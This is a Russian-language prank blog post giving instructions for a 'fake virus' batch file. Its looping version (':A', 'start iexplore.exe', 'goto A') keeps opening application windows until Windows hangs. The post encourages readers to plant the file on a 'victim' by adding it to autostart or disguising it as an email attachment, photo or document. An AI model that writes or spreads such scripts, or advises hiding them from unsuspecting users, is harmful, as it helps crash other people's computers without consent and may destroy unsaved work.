Лжевирус с открытием множества окон и программ

Лжевирус с открытием множества окон и программ

Всем привет и это очередной прикол от сайта Компьютер76. Сегодня рассмотрим ещё один трюк, и как всегда это будет bat файл, с помощью которого мы продолжим смеяться над нашими коллегами и друзьями. Как обычно – никаких знаний языков программирования, только API функции Windows.



Итак, давайте с помощью Блокнота напишем маленький лжевирус , который заставит открыться одновременно бесконечное количество активных окон любого из приложений, установленных на компьютере или, что решать вам, откроет лишь конкретный их список в отдельном окне. Этот лжевирус можно принести из дома или составить прямо за своим компьютером, так как он будет включать в себя общепринятые команды или включать список программ, которые традиционно установлены практически на каждом компьютере.

Чтобы лжевирус появился на свет, откроем Блокнот и запишем поэтапно следующие команды, которые будет вводить с новой строки каждую:

Сначала традиционный

@echo off

Далее следует

CLS

Затем записываем (также каждую с новой строки) список тех приложений, которые запустятся сразу после запуска нашего вируса с указанием расширения .exe. Таким образом, для начала рассмотрим щадящий или ограниченный вариант вируса. В любом случае, как вы понимаете, чем больше программ будет включено в список, тем больше шансов на то, что Windows не выберется из ямы. Каждая программа вносится после слова start. Вот как получилось у меня:

лжевирус система_перегружена

Я прописал команды на запуск приложений Internet Explorer, Калькулятор, браузер Chrome. Для наглядного примера вам будет вполне достаточно.

Есть ещё один вариант лжевируса, в котором на компьютере жертвы откроется множество активных окон приложения или нескольких программ сразу, что будет сродни действию настоящего вируса. А это уже почти гарантировано «повесит» систему. Так что используйте осторожно и с умом. Как всегда, впрочем. Для множества окон и программ вводим с новой строки всякий раз следующие команды.

@echo off

Далее уже знакомое

CLS

Прописываем новую команду (не забудьте двоеточие)

:A

Снова прописываем предполагаемое приложение с командой к запуску (пусть снова будет Internet Explorer)

start iexplore.exe

и закончим командой-петлёй

goto A

Всё. Нам остаётся, как обычно, переименовать файл в документ с расширением .bat и подсунуть жертве под любым благовидным предлогом (добавить в автозагрузку, прислать по почте, прикрепив к фотографии или документу). Перед тем, как попробовать действие на своём компьютере, закройте все важные документы. Компьютер, скорее всего, зависнет. Можно усилить эффект, добавив некоторое сообщение прямо в окне консоли команд. Посмотрите в рубрике по ссылке внизу статьи.

Успехов.

Читайте ещё про компьютерные приколы и шутки в специальной рубрике.

Запись опубликована в рубрике Пакости в Windows. Добавьте в закладки постоянную ссылку.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

пять + 1 =